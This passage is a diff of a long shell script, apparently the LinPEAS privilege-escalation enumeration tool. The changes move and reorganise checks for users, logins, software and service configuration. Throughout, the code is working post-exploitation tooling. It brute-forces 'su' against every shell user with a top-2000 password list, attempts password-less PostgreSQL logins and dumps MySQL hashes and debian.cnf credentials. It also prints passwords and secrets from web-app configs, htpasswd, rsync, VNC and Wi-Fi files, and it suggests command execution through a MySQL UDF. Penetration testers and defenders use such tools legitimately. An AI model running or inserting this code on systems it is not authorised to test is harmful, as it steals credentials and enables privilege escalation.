"s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," +echo "" + +#-- UI) Last logons +print_2title "Last logons" +(last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," +echo "" + +#-- UI) Login info +print_2title "Last time logon each user" +lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + +EXISTS_FINGER="$(command -v finger 2>/dev/null)" +if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then + dscl . list /Users | while read uname; do + ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) + if grep -q "$ushell" /etc/shells; then #Shell user + finger "$uname" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + echo "" + fi + done +fi +echo "" + +#-- UI) Password policy +if [ "$EXTRA_CHECKS" ]; then print_2title "Password policy" grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs" echo "" @@ -2253,38 +2356,77 @@ if echo $CHECKS | grep -q UsrI; then sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," echo "" fi - - #-- UI) Brute su - EXISTS_SUDO="$(command -v sudo 2>/dev/null)" - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then - print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC - POSSIBE_SU_BRUTE=$(check_if_su_brute); - if [ "$POSSIBE_SU_BRUTE" ]; then - SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1) - printf "%s\n" "$SHELLUSERS" | while read u; do - echo " Bruteforcing user $u..." - su_brute_user_num "$u" $PASSTRY - done - else - printf $GREEN"It's not possible to brute-force su.\n\n"$NC - fi - else - print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC - fi - print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC - echo "" - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi +#-- UI) Brute su +EXISTS_SUDO="$(command -v sudo 2>/dev/null)" +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then + print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC + POSSIBE_SU_BRUTE=$(check_if_su_brute); + if [ "$POSSIBE_SU_BRUTE" ]; then + SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1) + printf "%s\n" "$SHELLUSERS" | while read u; do + echo " Bruteforcing user $u..." + su_brute_user_num "$u" $PASSTRY + done + else + printf $GREEN"It's not possible to brute-force su.\n\n"$NC + fi +else + print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC +fi +print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC -if echo $CHECKS | grep -q SofI; then - ########################################### - #--------) Software Information (---------# - ########################################### - print_title "Software Information" +fi +echo '' +echo '' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi - #-- SI) Mysql version +if echo $CHECKS | grep -q software_information; then +print_title "Software Information" +########################################### +#--------) Software Information (---------# +########################################### + +#-- SI) Useful software +print_2title "Useful software" +for tool in $USEFUL_SOFTWARE; do command -v "$tool"; done +echo "" + +#-- SI) Search for compilers +print_2title "Installed Compilers" +(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); +echo "" + +if [ "$(command -v pkg 2>/dev/null)" ]; then + print_2title "Vulnerable Packages" + pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g" + echo "" +fi + +if [ "$(command -v brew 2>/dev/null)" ]; then + print_2title "Brew Installed Packages" + brew list + echo "" +fi + +if [ "$MACPEAS" ]; then + print_2title "Writable Installed Applications" + system_profiler SPApplicationsDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do + if [ -w "$f" ]; then + echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" + fi + done + + system_profiler SPFrameworksDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do + if [ -w "$f" ]; then + echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" + fi + done +fi + +#-- SI) Mysql version +if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ]; then print_2title "MySQL version" mysql --version 2>/dev/null || echo_not_found "mysql" echo "" @@ -2315,281 +2457,349 @@ if echo $CHECKS | grep -q SofI; then mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," else echo_no fi + echo "" +fi - #-- SI) Mysql credentials +#-- SI) Mysql credentials +if [ "$PSTORAGE_MYSQL" ] || [ "$DEBUG" ]; then print_2title "Searching mysql credentials and exec" - if [ "$PSTORAGE_MYSQL" ]; then - printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do - for f in $(find $d -name debian.cnf 2>/dev/null); do - if [ -r "$f" ]; then - echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED}," - cat "$f" - fi - done - for f in $(find $d -name user.MYD 2>/dev/null); do - if [ -r "$f" ]; then - echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED}," - grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password" - fi - done - for f in $(grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"); do - if [ -r "$f" ]; then - u=$(cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null) - echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - fi - done - for f in $(find $d -name my.cnf 2>/dev/null); do - if [ -r "$f" ]; then - echo "Found readable $f" - grep -v "^#" "$f" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED}," - fi - done - mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so") - if [ "$mysqlexec" ]; then - echo "Found $mysqlexec" - echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED}," + printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do + for f in $(find $d -name debian.cnf 2>/dev/null); do + if [ -r "$f" ]; then + echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED}," + cat "$f" fi done - else echo_not_found - fi - echo "" + for f in $(find $d -name user.MYD 2>/dev/null); do + if [ -r "$f" ]; then + echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED}," + grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password" + fi + done + for f in $(grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"); do + if [ -r "$f" ]; then + u=$(cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null) + echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + fi + done + for f in $(find $d -name my.cnf 2>/dev/null); do + if [ -r "$f" ]; then + echo "Found readable $f" + grep -v "^#" "$f" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED}," + fi + done + mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so") + if [ "$mysqlexec" ]; then + echo "Found $mysqlexec" + echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED}," + fi + done +fi +echo "" - print_2title "Analyzing MariaDB Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"mariadb\.cnf$\"`" ]; then echo_not_found "mariadb.cnf"; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "mariadb\.cnf$" | while read f; do ls -ld "$f" | sed -${E} "s,mariadb\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"debian\.cnf$\"`" ]; then echo_not_found "debian.cnf"; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "debian\.cnf$" | while read f; do ls -ld "$f" | sed -${E} "s,debian\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "user.*|password.*" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; +if [ "$PSTORAGE_MARIADB" ] || [ "$DEBUG" ]; then + print_2title "Analyzing MariaDB Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"mariadb\.cnf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "mariadb.cnf"; fi; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "mariadb\.cnf$" | while read f; do ls -ld "$f" | sed -${E} "s,mariadb\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"debian\.cnf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "debian.cnf"; fi; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "debian\.cnf$" | while read f; do ls -ld "$f" | sed -${E} "s,debian\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "user.*|password.*" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; +fi - print_2title "Analyzing PostgreSQL Files (limit 70)" +if [ "$PSTORAGE_POSTGRESQL" ] || [ "$DEBUG" ]; then + print_2title "Analyzing PostgreSQL Files (limit 70)" echo "Version: $(warn_exec psql -V 2>/dev/null)" - if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgadmin.*\.db$\"`" ]; then echo_not_found "pgadmin*.db"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgadmin.*\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,pgadmin.*\.db$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pg_hba\.conf$\"`" ]; then echo_not_found "pg_hba.conf"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pg_hba\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,pg_hba\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"postgresql\.conf$\"`" ]; then echo_not_found "postgresql.conf"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "postgresql\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,postgresql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgsql\.conf$\"`" ]; then echo_not_found "pgsql.conf"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgsql\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,pgsql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgadmin.*\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pgadmin*.db"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgadmin.*\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,pgadmin.*\.db$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pg_hba\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pg_hba.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pg_hba\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,pg_hba\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"postgresql\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "postgresql.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "postgresql\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,postgresql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgsql\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pgsql.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgsql\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,pgsql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; +fi - #-- SI) PostgreSQL brute - if [ "$TIMEOUT" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it. - #checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this - print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ " - if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ " - if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed "s,.)*,${SED_RED}," - else echo_no - fi - - print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... " - if [ "$(timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - print_list "PostgreSQL connection to template1 using pgsql/NOPASS ........... " - if [ "$(timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - echo "" +#-- SI) PostgreSQL brute +if [ "$TIMEOUT" ] && [ "$(command -v psql)" ] || [ "$DEBUG" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it. +#checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this + print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ " + if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + else echo_no fi - print_2title "Analyzing Mongo Files (limit 70)" - echo "Version: $(warn_exec mongo --version 2>/dev/null; warn_exec mongod --version 2>/dev/null)" - if ! [ "`echo \"$PSTORAGE_MONGO\" | grep -E \"mongod.*\.conf$\"`" ]; then echo_not_found "mongod*.conf"; fi; printf "%s" "$PSTORAGE_MONGO" | grep -E "mongod.*\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,mongod.*\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#"; done; echo ""; - - - print_2title "Analyzing Apache Files (limit 70)" - echo "Version: $(warn_exec apache2 -v 2>/dev/null; warn_exec httpd -v 2>/dev/null)" - print_3title 'PHP exec extensions' - grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null - if ! [ "`echo \"$PSTORAGE_APACHE\" | grep -E \"sites-enabled$\"`" ]; then echo_not_found "sites-enabled"; fi; printf "%s" "$PSTORAGE_APACHE" | grep -E "sites-enabled$" | while read f; do ls -ld "$f" | sed -${E} "s,sites-enabled$,${SED_RED},"; for ff in $(find "$f" -name "*"); do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "AuthType|AuthName|AuthUserFile|ServerName|ServerAlias" | grep -Ev "#" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias,${SED_RED},g"; done; echo "";done; echo ""; - if ! [ "`echo \"$PSTORAGE_APACHE\" | grep -E \"000-default\.conf$\"`" ]; then echo_not_found "000-default.conf"; fi; printf "%s" "$PSTORAGE_APACHE" | grep -E "000-default\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,000-default\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Tomcat Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_TOMCAT\" | grep -E \"tomcat-users\.xml$\"`" ]; then echo_not_found "tomcat-users.xml"; fi; printf "%s" "$PSTORAGE_TOMCAT" | grep -E "tomcat-users\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,tomcat-users\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username=|password=" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing FastCGI Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_FASTCGI\" | grep -E \"fastcgi_params$\"`" ]; then echo_not_found "fastcgi_params"; fi; printf "%s" "$PSTORAGE_FASTCGI" | grep -E "fastcgi_params$" | while read f; do ls -ld "$f" | sed -${E} "s,fastcgi_params$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "DB_NAME|DB_USER|DB_PASS" | sed -${E} "s,DB_NAME|DB_USER|DB_PASS,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Http conf Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_HTTP_CONF\" | grep -E \"httpd\.conf$\"`" ]; then echo_not_found "httpd.conf"; fi; printf "%s" "$PSTORAGE_HTTP_CONF" | grep -E "httpd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,httpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "htaccess.*|htpasswd.*" | grep -Ev "\W+\#|^#" | sed -${E} "s,htaccess.*|htpasswd.*,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Htpasswd Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_HTPASSWD\" | grep -E \"\.htpasswd$\"`" ]; then echo_not_found ".htpasswd"; fi; printf "%s" "$PSTORAGE_HTPASSWD" | grep -E "\.htpasswd$" | while read f; do ls -ld "$f" | sed -${E} "s,\.htpasswd$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing PHP Sessions Files (limit 70)" - ls /var/lib/php/sessions 2>/dev/null || echo_not_found /var/lib/php/sessions - if ! [ "`echo \"$PSTORAGE_PHP_SESSIONS\" | grep -E \"sess_.*$\"`" ]; then echo_not_found "sess_*"; fi; printf "%s" "$PSTORAGE_PHP_SESSIONS" | grep -E "sess_.*$" | while read f; do ls -ld "$f" | sed -${E} "s,sess_.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - - - print_2title "Analyzing Wordpress Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_WORDPRESS\" | grep -E \"wp-config\.php$\"`" ]; then echo_not_found "wp-config.php"; fi; printf "%s" "$PSTORAGE_WORDPRESS" | grep -E "wp-config\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,wp-config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "PASSWORD|USER|NAME|HOST" | sed -${E} "s,PASSWORD|USER|NAME|HOST,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Drupal Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_DRUPAL\" | grep -E \"settings\.php$\"`" ]; then echo_not_found "settings.php"; fi; printf "%s" "$PSTORAGE_DRUPAL" | grep -E "settings\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,settings\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix'" | sed -${E} "s,drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix',${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Moodle Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_MOODLE\" | grep -E \"config\.php$\"`" ]; then echo_not_found "config.php"; fi; printf "%s" "$PSTORAGE_MOODLE" | grep -E "config\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "dbtype|dbhost|dbuser|dbhost|dbpass|dbport" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Supervisord Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_SUPERVISORD\" | grep -E \"supervisord\.conf$\"`" ]; then echo_not_found "supervisord.conf"; fi; printf "%s" "$PSTORAGE_SUPERVISORD" | grep -E "supervisord\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,supervisord\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "port.*=|username.*=|password.*=" | sed -${E} "s,port.*=|username.*=|password.*=,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Cesi Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_CESI\" | grep -E \"cesi\.conf$\"`" ]; then echo_not_found "cesi.conf"; fi; printf "%s" "$PSTORAGE_CESI" | grep -E "cesi\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,cesi\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username.*=|password.*=|host.*=|port.*=|database.*=" | sed -${E} "s,username.*=|password.*=|host.*=|port.*=|database.*=,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Rsync Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.conf$\"`" ]; then echo_not_found "rsyncd.conf"; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,rsyncd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,secrets.*|auth.*users.*=,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.secrets$\"`" ]; then echo_not_found "rsyncd.secrets"; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.secrets$" | while read f; do ls -ld "$f" | sed -${E} "s,rsyncd\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Hostapd Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_HOSTAPD\" | grep -E \"hostapd\.conf$\"`" ]; then echo_not_found "hostapd.conf"; fi; printf "%s" "$PSTORAGE_HOSTAPD" | grep -E "hostapd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,hostapd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,passphrase.*,${SED_RED},g"; done; echo ""; - - - #-- SI) Wifi conns - print_2title "Searching wifi conns file" - wifi=$(find /etc/NetworkManager/system-connections/ -type f 2>/dev/null) - if [ "$wifi" ]; then - printf "%s\n" "$wifi" | while read f; do echo "$f"; cat "$f" 2>/dev/null | grep "psk.*=" | sed "s,psk.*,${SED_RED},"; done - else echo_not_found - fi - echo "" - - print_2title "Analyzing Anaconda ks Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_ANACONDA_KS\" | grep -E \"anaconda-ks\.cfg$\"`" ]; then echo_not_found "anaconda-ks.cfg"; fi; printf "%s" "$PSTORAGE_ANACONDA_KS" | grep -E "anaconda-ks\.cfg$" | while read f; do ls -ld "$f" | sed -${E} "s,anaconda-ks\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rootpw.*" | sed -${E} "s,rootpw.*,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing VNC Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"\.vnc$\"`" ]; then echo_not_found ".vnc"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "\.vnc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.vnc$,${SED_RED},"; for ff in $(find "$f" -name "passwd"); do ls -ld "$ff" | sed -${E} "s,passwd,${SED_RED},"; done; echo "";done; echo ""; - if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.c.*nf.*$\"`" ]; then echo_not_found "*vnc*.c*nf*"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.c.*nf.*$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.c.*nf.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.ini$\"`" ]; then echo_not_found "*vnc*.ini"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.txt$\"`" ]; then echo_not_found "*vnc*.txt"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.xml$\"`" ]; then echo_not_found "*vnc*.xml"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Ldap Files (limit 70)" - echo "The password hash is from the {SSHA} to 'structural'" - if ! [ "`echo \"$PSTORAGE_LDAP\" | grep -E \"ldap$\"`" ]; then echo_not_found "ldap"; fi; printf "%s" "$PSTORAGE_LDAP" | grep -E "ldap$" | while read f; do ls -ld "$f" | sed -${E} "s,ldap$,${SED_RED},"; for ff in $(find "$f" -name "*.bdb"); do ls -ld "$ff" | sed -${E} "s,.bdb,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E -i -a -o "description.*" | sort | uniq | sed -${E} "s,administrator|password|ADMINISTRATOR|PASSWORD|Password|Administrator,${SED_RED},g"; done; echo "";done; echo ""; - - - print_2title "Analyzing OpenVPN Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_OPENVPN\" | grep -E \"\.ovpn$\"`" ]; then 